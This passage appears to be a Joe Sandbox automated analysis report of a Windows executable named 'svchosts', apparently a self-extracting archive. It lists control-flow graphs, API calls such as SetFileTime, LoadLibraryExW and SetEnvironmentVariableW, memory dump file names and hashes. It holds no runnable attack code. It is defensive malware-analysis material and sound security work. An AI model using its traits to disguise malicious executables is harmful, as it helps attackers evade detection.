                                                                      • GetLastError.KERNEL32(?,?,002978AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00299A96
                                                                      • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,002978AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00299ADB
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: File$CreateErrorLast$Time
                                                                      • String ID:
                                                                      • API String ID: 1999340476-0
                                                                      • Opcode ID: d3c8bc503937b8ea8cc8d6fa974597b653b642415aa2359d2da55a1f14e5df9f
                                                                      • Instruction ID: 7e76a53dd074d3cee9ab8401760f545c171f830437781dc1c3e3e6423c74ec78
                                                                      • Opcode Fuzzy Hash: d3c8bc503937b8ea8cc8d6fa974597b653b642415aa2359d2da55a1f14e5df9f
                                                                      • Instruction Fuzzy Hash: 114120715547466BEB20CE28DC0ABDABAD4EB01334F10071DF9E4921D0E7B5A9A88BA1

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 999 2aa2c7-2aa2e6 GetClassNameW 1000 2aa2e8-2aa2fd call 2a17ac 999->1000 1001 2aa30e-2aa310 999->1001 1006 2aa2ff-2aa30b FindWindowExW 1000->1006 1007 2aa30d 1000->1007 1002 2aa31b-2aa31f 1001->1002 1003 2aa312-2aa315 SHAutoComplete 1001->1003 1003->1002 1006->1007 1007->1001
                                                                      APIs
                                                                      • GetClassNameW.USER32(?,?,00000050), ref: 002AA2DE
                                                                      • SHAutoComplete.SHLWAPI(?,00000010), ref: 002AA315
                                                                        • Part of subcall function 002A17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0029BB05,00000000,.exe,?,?,00000800,?,?,002A85DF,?), ref: 002A17C2
                                                                      • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 002AA305
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                      • String ID: EDIT
                                                                      • API String ID: 4243998846-3080729518
                                                                      • Opcode ID: 2a7405fbb90ee5bc06a08361e39bf028a1752370c5a12f196940dd9cf4759a0d
                                                                      • Instruction ID: 66eec73fb8da00dc35461d3b3fdf3ab8f45fcde00456c2616d5c9605803454e0
                                                                      • Opcode Fuzzy Hash: 2a7405fbb90ee5bc06a08361e39bf028a1752370c5a12f196940dd9cf4759a0d
                                                                      • Instruction Fuzzy Hash: 4CF0AE33A1161877DB305A546C09FEB776C9F57B50F040166BD05F2180DF609D65C5F6

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1008 2ad287-2ad2b2 call 2ae360 SetEnvironmentVariableW call 29fbd8 1012 2ad2b7-2ad2bb 1008->1012 1013 2ad2df-2ad2e3 1012->1013 1014 2ad2bd-2ad2c1 1012->1014 1015 2ad2ca-2ad2d1 call 29fcf1 1014->1015 1018 2ad2c3-2ad2c9 1015->1018 1019 2ad2d3-2ad2d9 SetEnvironmentVariableW 1015->1019 1018->1015 1019->1013
                                                                      APIs
                                                                      • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 002AD29D
                                                                      • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 002AD2D9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: EnvironmentVariable
                                                                      • String ID: sfxcmd$sfxpar
                                                                      • API String ID: 1431749950-3493335439
                                                                      • Opcode ID: 1acf3d5413ada1def5fc58e63d206f189791ff1af3c982f05a7533e6ce1edb9d
                                                                      • Instruction ID: e60d558d4aedf49751d4a338da8bfc594f984a33fab285ad715f744634bde3d6
                                                                      • Opcode Fuzzy Hash: 1acf3d5413ada1def5fc58e63d206f189791ff1af3c982f05a7533e6ce1edb9d
                                                                      • Instruction Fuzzy Hash: 84F0A772820238A7CB206F909C19FBA7758AF1A741B044556FC8996142DA60DD60DAF1

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1020 29984e-29985a 1021 29985c-299864 GetStdHandle 1020->1021 1022 299867-29987e ReadFile 1020->1022 1021->1022 1023 2998da 1022->1023 1024 299880-299889 call 299989 1022->1024 1025 2998dd-2998e2 1023->1025 1028 29988b-299893 1024->1028 1029 2998a2-2998a6 1024->1029 1028->1029 1030 299895 1028->1030 1031 2998a8-2998b1 GetLastError 1029->1031 1032 2998b7-2998bb 1029->1032 1033 299896-2998a0 call 29984e 1030->1033 1031->1032 1034 2998b3-2998b5 1031->1034 1035 2998bd-2998c5 1032->1035 1036 2998d5-2998d8 1032->1036 1033->1025 1034->1025 1035->1036 1038 2998c7-2998d0 GetLastError 1035->1038 1036->1025 1038->1036 1039 2998d2-2998d3 1038->1039 1039->1033
                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 0029985E
                                                                      • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00299876
                                                                      • GetLastError.KERNEL32 ref: 002998A8
                                                                      • GetLastError.KERNEL32 ref: 002998C7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$FileHandleRead
                                                                      • String ID:
                                                                      • API String ID: 2244327787-0
                                                                      • Opcode ID: 15c67813774d2f50dba48ac363df59648baade16e4a78d2bcd9b4a4f82be8250
                                                                      • Instruction ID: 28c04976c48b88ee437f71c85fa9b5e5e5eaac679f586667c2450d9bde9c28aa
                                                                      • Opcode Fuzzy Hash: 15c67813774d2f50dba48ac363df59648baade16e4a78d2bcd9b4a4f82be8250
                                                                      • Instruction Fuzzy Hash: AE11A931920209EBDF209F5DD808AA937ACFF02731F10C52EF82A85680DB759EA09F51

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1041 2ba4f4-2ba508 1042 2ba50a-2ba513 1041->1042 1043 2ba515-2ba530 LoadLibraryExW 1041->1043 1044 2ba56c-2ba56e 1042->1044 1045 2ba559-2ba55f 1043->1045 1046 2ba532-2ba53b GetLastError 1043->1046 1047 2ba568 1045->1047 1048 2ba561-2ba562 FreeLibrary 1045->1048 1049 2ba54a 1046->1049 1050 2ba53d-2ba548 LoadLibraryExW 1046->1050 1052 2ba56a-2ba56b 1047->1052 1048->1047 1051 2ba54c-2ba54e 1049->1051 1050->1051 1051->1045 1053 2ba550-2ba557 1051->1053 1052->1044 1053->1052
                                                                      APIs
                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,002B3713,00000000,00000000,?,002BA49B,002B3713,00000000,00000000,00000000,?,002BA698,00000006,FlsSetValue), ref: 002BA526
                                                                      • GetLastError.KERNEL32(?,002BA49B,002B3713,00000000,00000000,00000000,?,002BA698,00000006,FlsSetValue,002C7348,002C7350,00000000,00000364,?,002B9077), ref: 002BA532
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,002BA49B,002B3713,00000000,00000000,00000000,?,002BA698,00000006,FlsSetValue,002C7348,002C7350,00000000), ref: 002BA540
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 3177248105-0
                                                                      • Opcode ID: 5f91b24d885c905a0c0d5a82a3c9756cbec9169e1c7b598685dc19f31defcebb
                                                                      • Instruction ID: 024d3306d2fb1ac04d0ce05e7bbf9c1062ddd131e0068d35b11e3e3792b5f798
                                                                      • Opcode Fuzzy Hash: 5f91b24d885c905a0c0d5a82a3c9756cbec9169e1c7b598685dc19f31defcebb
                                                                      • Instruction Fuzzy Hash: 8201F732A31223ABC7318E6CAC48FE67B98AF45BE17944520F90AD3140D771DB10C7E1
                                                                      APIs
                                                                        • Part of subcall function 002B8FA5: GetLastError.KERNEL32(?,002D0EE8,002B3E14,002D0EE8,?,?,002B3713,00000050,?,002D0EE8,00000200), ref: 002B8FA9
                                                                        • Part of subcall function 002B8FA5: _free.LIBCMT ref: 002B8FDC
                                                                        • Part of subcall function 002B8FA5: SetLastError.KERNEL32(00000000,?,002D0EE8,00000200), ref: 002B901D
                                                                        • Part of subcall function 002B8FA5: _abort.LIBCMT ref: 002B9023
                                                                        • Part of subcall function 002BB2AE: _abort.LIBCMT ref: 002BB2E0
                                                                        • Part of subcall function 002BB2AE: _free.LIBCMT ref: 002BB314
                                                                        • Part of subcall function 002BAF1B: GetOEMCP.KERNEL32(00000000,?,?,002BB1A5,?), ref: 002BAF46
                                                                      • _free.LIBCMT ref: 002BB200
                                                                      • _free.LIBCMT ref: 002BB236
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorLast_abort
                                                                      • String ID: ,
                                                                      • API String ID: 2991157371-609127500
                                                                      • Opcode ID: 1f88bb8543cc38a52e1c07e15cf8f5c7e6e69bad8e7fe4629ad5db11d6050965
                                                                      • Instruction ID: b29207923b222b3bd57c582b90cf457dc4a3c8536633e44ab5f430433757549e
                                                                      • Opcode Fuzzy Hash: 1f88bb8543cc38a52e1c07e15cf8f5c7e6e69bad8e7fe4629ad5db11d6050965
                                                                      • Instruction Fuzzy Hash: 31313B31920205AFDB11EFA9D845BED77F5EF413A0F254099F8189B291EBB29D51CF40
                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,0029CC94,00000001,?,?,?,00000000,002A4ECD,?,?,?), ref: 00299F4C
                                                                      • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,002A4ECD,?,?,?,?,?,002A4972,?), ref: 00299F8E
                                                                      • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,0029CC94,00000001,?,?), ref: 00299FB8
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite$Handle
                                                                      • String ID:
                                                                      • API String ID: 4209713984-0
                                                                      • Opcode ID: 6e63fa2e927b40fc33b5fb04dc98ae5237c23b38752d6d243ea875fa0b08e94e
                                                                      • Instruction ID: 866f327e41d5f146676d2c6b49b5c959534b7a74a62665df4c724ead6f45ff5e
                                                                      • Opcode Fuzzy Hash: 6e63fa2e927b40fc33b5fb04dc98ae5237c23b38752d6d243ea875fa0b08e94e
                                                                      • Instruction Fuzzy Hash: 3A31F6712183069BDF24CF18D848B6AFBA8EB50720F04495DF845DB691CB75DD98CBA3
                                                                      APIs
                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0029A113,?,00000001,00000000,?,?), ref: 0029A22E
                                                                      • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0029A113,?,00000001,00000000,?,?), ref: 0029A261
                                                                      • GetLastError.KERNEL32(?,?,?,?,0029A113,?,00000001,00000000,?,?), ref: 0029A27E
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectory$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 2485089472-0
                                                                      • Opcode ID: 53c31cfeb4003153a74f33dbd5e94b235cd1372a0c8fd00e351b5133b5495fda
                                                                      • Instruction ID: b386d52fbcd169c7f03f3c053488e69094ce37ab271804c039bcca33a3a45107
                                                                      • Opcode Fuzzy Hash: 53c31cfeb4003153a74f33dbd5e94b235cd1372a0c8fd00e351b5133b5495fda
                                                                      • Instruction Fuzzy Hash: 2D01923197031566DF32AF749D09BEE3358AF06B81F044851FC05D5051DB66DA618AE3
                                                                      APIs
                                                                      • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 002BB019
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: Info
                                                                      • String ID:
                                                                      • API String ID: 1807457897-3916222277
                                                                      • Opcode ID: 4f47ca1944a13a29cb0ad0cfd3a5e88ead33c974248dcda86647c6982d8f9a70
                                                                      • Instruction ID: 37243d67f8fbe008110b98fb55fccf34886bbd8ac35d4b49025e4ada54e5cb87
                                                                      • Opcode Fuzzy Hash: 4f47ca1944a13a29cb0ad0cfd3a5e88ead33c974248dcda86647c6982d8f9a70
                                                                      • Instruction Fuzzy Hash: D44115B052424C9EDF228E288C94BFABBADDB45344F1408EDE59E87142D3B59A55CF20
                                                                      APIs
                                                                      • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 002BA79D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: String
                                                                      • String ID: LCMapStringEx
                                                                      • API String ID: 2568140703-3893581201
                                                                      • Opcode ID: e35525184753ead53fe40f9cf1cdc18f1d8466965dc56d90eb07617949fc4f51
                                                                      • Instruction ID: 83021b4729925cc4c0540c5732ae2d628783410adcda1eafe0bdb80ddb708a72
                                                                      • Opcode Fuzzy Hash: e35525184753ead53fe40f9cf1cdc18f1d8466965dc56d90eb07617949fc4f51
                                                                      • Instruction Fuzzy Hash: 7D011332524209BBCF029FA0DD05DEE7F76EF08760F018154FE1426160CA728931BF92
                                                                      APIs
                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,002B9D2F), ref: 002BA715
                                                                      Strings
                                                                      • InitializeCriticalSectionEx, xrefs: 002BA6E5
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: CountCriticalInitializeSectionSpin
                                                                      • String ID: InitializeCriticalSectionEx
                                                                      • API String ID: 2593887523-3084827643
                                                                      • Opcode ID: 7884cb26c9b33ec7ab6df82639e4539966aeea0b925cce8d795584b0ff7a0e7b
                                                                      • Instruction ID: 363dcf16377099f45f15a985fe8bcd8316a737cc6085451a3e0611d87d49f005
                                                                      • Opcode Fuzzy Hash: 7884cb26c9b33ec7ab6df82639e4539966aeea0b925cce8d795584b0ff7a0e7b
                                                                      • Instruction Fuzzy Hash: 71F0BE3166521CBBCF11AF60DC0ADAEBF75EF45B60B008158FC091A260DE719E70AB91
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: Alloc
                                                                      • String ID: FlsAlloc
                                                                      • API String ID: 2773662609-671089009
                                                                      • Opcode ID: 9428fc03981967ed75892af2b112d4d47a88971eef8599c453b289b5ed70cac4
                                                                      • Instruction ID: 3d894ffad1c51424ed2ccd3ce3b151e1bcc425560e97cd6a9b47dc18a731a4e0
                                                                      • Opcode Fuzzy Hash: 9428fc03981967ed75892af2b112d4d47a88971eef8599c453b289b5ed70cac4
                                                                      • Instruction Fuzzy Hash: C6E05C70B752286B8620AF509C09DEDBB64CF56710B414159FC0917240CD745F219BD6
                                                                      APIs
                                                                      • try_get_function.LIBVCRUNTIME ref: 002B32AF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: try_get_function
                                                                      • String ID: FlsAlloc
                                                                      • API String ID: 2742660187-671089009
                                                                      • Opcode ID: 3abdd34c6bbfd8a66b530ebab323d2556cd18e5b53dbb227f462d630d52ae82d
                                                                      • Instruction ID: 4def853c1153e1e2bcf5b9bb3e73fa91f2fbf24a7a123303410e8e2d63031c15
                                                                      • Opcode Fuzzy Hash: 3abdd34c6bbfd8a66b530ebab323d2556cd18e5b53dbb227f462d630d52ae82d
                                                                      • Instruction Fuzzy Hash: BAD0C2217A06346A851036846C02EAA7A088A02BF5B450252FE0C1A24284A599B00AC5
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002AE20B
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: 3To
                                                                      • API String ID: 1269201914-245939750
                                                                      • Opcode ID: a69315327e96953d1a9271f6af6dad724371c1868c8c5e357a02677f83b3f52d
                                                                      • Instruction ID: a9d34e4276cac75bc18a69a09ddc6496ef7d1247130b0add15edd229b3959144
                                                                      • Opcode Fuzzy Hash: a69315327e96953d1a9271f6af6dad724371c1868c8c5e357a02677f83b3f52d
                                                                      • Instruction Fuzzy Hash: 86B012922BE001BF321C11007E07E37032CC4C3F90330812EF606D4480DD804D3A4432
                                                                      APIs
                                                                        • Part of subcall function 002BAF1B: GetOEMCP.KERNEL32(00000000,?,?,002BB1A5,?), ref: 002BAF46
                                                                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,002BB1EA,?,00000000), ref: 002BB3C4
                                                                      • GetCPInfo.KERNEL32(00000000,002BB1EA,?,?,?,002BB1EA,?,00000000), ref: 002BB3D7
                                                                      Memory Dump Source
